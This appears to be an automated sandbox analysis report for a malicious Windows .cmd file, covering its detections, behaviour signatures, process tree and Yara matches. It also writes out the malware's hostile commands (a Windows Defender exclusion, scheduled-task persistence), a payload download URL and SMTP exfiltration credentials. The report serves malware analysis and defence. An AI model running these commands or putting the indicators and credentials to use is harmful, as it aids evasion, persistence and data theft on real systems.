Edit tour

Windows Analysis Report
PO_KB#67897.cmd

Overview

General Information

Sample name:	PO_KB#67897.cmd
Analysis ID:	1582352
MD5:	4eb1270d4006c687782644391aa435d3
SHA1:	bf92d77c0f777ba31d635c049200774604dea87f
SHA256:	cdc5d714c1b295153567e4047bb0d907a18e6b80863ac159ad4d1777d8919ee3
Tags:	cmduser-julianmckein
Infos:

Detection

DBatLoader, MassLogger RAT, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected DBatLoader

Yara detected MassLogger RAT

Yara detected PureLog Stealer

Yara detected Telegram RAT

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains very large strings

.NET source code references suspicious native API functions

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Contains functionality to capture screen (.Net source)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Drops PE files with a suspicious file extension

Drops large PE files

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Sample is not signed and drops a device driver

Sample uses process hollowing technique

Sigma detected: DLL Search Order Hijackig Via Additional Space in Path

Sigma detected: Execution from Suspicious Folder

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Parent in Public Folder Suspicious Process

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a connection to the internet is available

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains functionality to query locales information (e.g. system language)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Execution of Suspicious File Type Extension

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

cmd.exe (PID: 964 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\PO_KB#67897.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

extrac32.exe (PID: 516 cmdline: extrac32 /y "C:\Users\user\Desktop\PO_KB#67897.cmd" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)

x.exe (PID: 5792 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 9B151296A899B0D58575CDE4E9563D18)

cmd.exe (PID: 6228 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rpkhzpuO.pif (PID: 3080 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Trading_AIBot.exe (PID: 3404 cmdline: "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" MD5: E91A1DB64F5262A633465A0AAFF7A0B0)

powershell.exe (PID: 1584 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 3536 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 4340 cmdline: "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 05:52 /du 23:59 /sc daily /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7016 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

apihost.exe (PID: 2128 cmdline: "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" MD5: 8D01E7CA64DB66A5D357A071C6E39643)

Microsofts.exe (PID: 3248 cmdline: "C:\Users\user\AppData\Local\Temp\Microsofts.exe" MD5: F6B8018A27BCDBAA35778849B586D31B)

Oupzhkpr.PIF (PID: 2724 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: 9B151296A899B0D58575CDE4E9563D18)

cmd.exe (PID: 5900 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rpkhzpuO.pif (PID: 1656 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Oupzhkpr.PIF (PID: 2216 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: 9B151296A899B0D58575CDE4E9563D18)

cmd.exe (PID: 5880 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rpkhzpuO.pif (PID: 6028 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

Oupzhkpr.PIF (PID: 7056 cmdline: "C:\Users\Public\Libraries\Oupzhkpr.PIF" MD5: 9B151296A899B0D58575CDE4E9563D18)

cmd.exe (PID: 3080 cmdline: C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 5936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rpkhzpuO.pif (PID: 1080 cmdline: C:\Users\Public\Libraries\rpkhzpuO.pif MD5: 22331ABCC9472CC9DC6F37FAF333AA2C)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DBatLoader	This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.	No Attribution	https://blog.vincss.net/2020/09/re016-malware-analysis-modiloader-eng.html https://blog.vincss.net/re016-malware-analysis-modiloader/ https://gi7w0rm.medium.com/uncovering-ddgroup-a-long-time-threat-actor-d3b3020625a4 https://isc.sans.edu/diary/Malspam+pushes+ModiLoader+DBatLoader+infection+for+Remcos+RAT/29896 https://kienmanowar.wordpress.com/2024/04/09/quicknote-phishing-email-distributes-warzone-rat-via-dbatloader/	https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://lwaziacademy.com/wps/200_Oupzhkprnvw"]}

Threatname: MassLogger

{"EXfil Mode": "SMTP", "From": "server1@massmaesure.com", "Password": "london@1759", "Server": "lax029.hawkhost.com", "To": "server2@massmaesure.com", "Port": 587}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\Microsofts.exe	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
C:\Users\user\AppData\Local\Temp\Microsofts.exe	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
C:\Users\user\AppData\Local\Temp\Microsofts.exe	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
C:\Users\user\AppData\Local\Temp\Microsofts.exe	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler
C:\Users\user\AppData\Local\Temp\Microsofts.exe	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth

Memory Dumps

Source	Rule	Description	Author	Strings
0000001A.00000002.2555582256.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000015.00000001.2306714733.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000001F.00000002.2695514518.000000002EA63000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.3379727606.0000000002A2F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000001F.00000002.2698667477.000000002ECD0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000001.2174375803.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000001A.00000002.2653675351.000000002FF20000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000003.2176410380.000000002350A000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000015.00000002.2565470254.0000000033743000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001F.00000003.2505077127.000000002D0EA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001A.00000002.2644300802.000000002E2E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001F.00000002.2704916181.00000000312B0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2209421224.0000000001420000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
0000000A.00000000.2197832662.00000000006E2000.00000002.00000001.01000000.0000000C.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xffcd:$a1: get_encryptedPassword 0x10309:$a2: get_encryptedUsername 0xfd5a:$a3: get_timePasswordChanged 0xfe7b:$a4: get_passwordField 0xffe3:$a5: set_encryptedPassword 0x119b3:$a7: get_logins 0x11664:$a8: GetOutlookPasswords 0x11442:$a9: StartKeylogger 0x11903:$a10: KeyLoggerEventArgs 0x1149f:$a11: KeyLoggerEventArgsEventHandler
00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000008.00000002.2272905069.0000000026564000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2918d:$a1: get_encryptedPassword 0x413bd:$a1: get_encryptedPassword 0x595dd:$a1: get_encryptedPassword 0x294c9:$a2: get_encryptedUsername 0x416f9:$a2: get_encryptedUsername 0x59919:$a2: get_encryptedUsername 0x28f1a:$a3: get_timePasswordChanged 0x4114a:$a3: get_timePasswordChanged 0x5936a:$a3: get_timePasswordChanged 0x2903b:$a4: get_passwordField 0x4126b:$a4: get_passwordField 0x5948b:$a4: get_passwordField 0x291a3:$a5: set_encryptedPassword 0x413d3:$a5: set_encryptedPassword 0x595f3:$a5: set_encryptedPassword 0x2ab73:$a7: get_logins 0x42da3:$a7: get_logins 0x5afc3:$a7: get_logins 0x2a824:$a8: GetOutlookPasswords 0x42a54:$a8: GetOutlookPasswords 0x5ac74:$a8: GetOutlookPasswords
00000008.00000001.2174375803.0000000001420000.00000040.00000001.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
0000001A.00000002.2646464054.000000002F7C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000004.00000002.2176575888.0000000002206000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000015.00000002.2626188397.0000000034A95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001A.00000002.2639575698.000000002D083000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001F.00000002.2653640305.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000004.00000002.2259800821.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
00000008.00000002.2276789747.0000000027A90000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000A.00000002.3379727606.0000000002B24000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000015.00000002.2627942016.0000000035F30000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000015.00000002.2463806238.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000001A.00000001.2405390189.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000008.00000002.2277062923.00000000280C0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000015.00000002.2629075725.0000000036680000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2262951312.0000000025133000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001F.00000002.2700260465.000000002FD95000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2272905069.00000000264E5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000001F.00000001.2498527749.0000000000400000.00000040.00000001.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
00000015.00000003.2314988058.0000000031AE5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.2209421224.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
0000001A.00000003.2417739511.000000002B351000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
Process Memory Space: x.exe PID: 5792	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: rpkhzpuO.pif PID: 3080	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: rpkhzpuO.pif PID: 3080	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: rpkhzpuO.pif PID: 3080	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: rpkhzpuO.pif PID: 3080	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: rpkhzpuO.pif PID: 3080	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2577d7:$a1: get_encryptedPassword 0x257b04:$a2: get_encryptedUsername 0x257578:$a3: get_timePasswordChanged 0x257699:$a4: get_passwordField 0x2577ed:$a5: set_encryptedPassword 0x25915f:$a7: get_logins 0x258e10:$a8: GetOutlookPasswords 0x258bee:$a9: StartKeylogger 0x2590af:$a10: KeyLoggerEventArgs 0x258c4b:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: Microsofts.exe PID: 3248	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: Microsofts.exe PID: 3248	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Microsofts.exe PID: 3248	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: Microsofts.exe PID: 3248	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2673d:$a1: get_encryptedPassword 0x26a6a:$a2: get_encryptedUsername 0x264de:$a3: get_timePasswordChanged 0x265ff:$a4: get_passwordField 0x26753:$a5: set_encryptedPassword 0x280c5:$a7: get_logins 0x27d76:$a8: GetOutlookPasswords 0x27b54:$a9: StartKeylogger 0x28015:$a10: KeyLoggerEventArgs 0x27bb1:$a11: KeyLoggerEventArgsEventHandler
Click to see the 47 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
21.2.rpkhzpuO.pif.36680000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2d0c3f56.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.rpkhzpuO.pif.34ad3d90.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.1.rpkhzpuO.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
21.2.rpkhzpuO.pif.36680000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.3.rpkhzpuO.pif.2350ac48.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.3.rpkhzpuO.pif.2b351240.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
